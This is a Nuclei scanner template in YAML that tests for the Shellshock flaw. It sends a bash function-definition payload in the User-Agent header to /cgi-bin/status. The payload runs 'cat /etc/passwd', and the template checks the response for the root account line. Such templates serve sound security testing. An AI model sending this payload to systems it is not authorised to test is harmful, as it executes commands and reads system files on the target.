nuclei-templates/vulnerabilities/rce-shellshock-user-agent.yaml

19 lines
359 B
YAML

id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
requests:
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body